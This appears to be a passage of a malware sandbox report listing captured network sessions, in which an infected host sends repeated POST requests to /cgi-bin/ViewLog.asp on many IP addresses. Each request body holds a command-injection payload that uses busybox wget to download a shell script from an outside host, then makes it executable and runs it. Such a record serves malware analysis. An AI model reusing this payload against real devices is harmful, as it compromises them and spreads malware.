                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:41.247992039 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:56.861888885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:29.113251925 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        175192.168.2.234388094.112.164.1958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.312158108 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        176192.168.2.235656894.67.106.888080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.319602013 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.659334898 CEST376INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 16:35:25 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        177192.168.2.234534062.29.6.68080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.324819088 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        178192.168.2.233721085.208.123.2338080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.330012083 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.673331022 CEST1289INHTTP/1.0 400 Bad Request
                                                        Server: squid/3.1.23
                                                        Mime-Version: 1.0
                                                        Date: Sun, 14 Apr 2024 14:04:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3167
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0a 7d
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff;}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        179192.168.2.234379294.120.34.98080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:26.333460093 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        180192.168.2.235310031.136.22.408080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.012974024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:28.993686914 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:30.977389097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:35.104773998 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:43.039715052 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.909482956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:31.160928965 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        181192.168.2.235078895.68.23.398080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.024420023 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:28.354219913 CEST561INHTTP/1.1 404 Not Found
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Headers: Content-Type
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Sun, 14 Apr 2024 14:35:27 GMT
                                                        Server: WebServer
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        182192.168.2.236091831.200.110.848080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.033327103 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        183192.168.2.234323494.122.199.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.034432888 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        184192.168.2.233323631.200.39.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.036142111 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        185192.168.2.234236231.136.214.2048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:28.330285072 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.313543081 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
